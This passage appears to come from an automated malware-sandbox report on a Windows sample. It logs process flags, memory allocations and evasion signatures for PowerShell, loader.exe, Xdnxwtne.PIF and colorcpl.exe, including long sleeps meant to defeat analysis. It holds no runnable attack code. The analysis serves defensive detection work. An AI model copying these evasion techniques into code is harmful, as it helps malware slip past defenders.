Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Allocates many large memory junks
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 2FF0000 memory commit 500006912 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 2FF1000 memory commit 500154368 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3016000 memory commit 500002816 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3017000 memory commit 500047872 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3022000 memory commit 500015104 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3026000 memory commit 500006912 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3027000 memory commit 500015104 Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3020000 memory commit 500006912 Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3021000 memory commit 500154368 Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3046000 memory commit 500002816 Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3047000 memory commit 500047872 Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3052000 memory commit 500015104 Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3056000 memory commit 500006912 Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3057000 memory commit 500015104 Jump to behavior
Contains functionality to enumerate running services
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 20_2_0041A941
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 20_2_06C8B752
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1670 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2007 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7825 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1895 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6512 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3019 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 9482 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: foregroundWindowGot 1755 Jump to behavior
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\colorcpl.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 6.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164 Thread sleep count: 1670 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172 Thread sleep count: 120 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6012 Thread sleep count: 2007 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5976 Thread sleep count: 132 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324 Thread sleep time: -20291418481080494s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep count: 6512 > 30 Jump to behavior
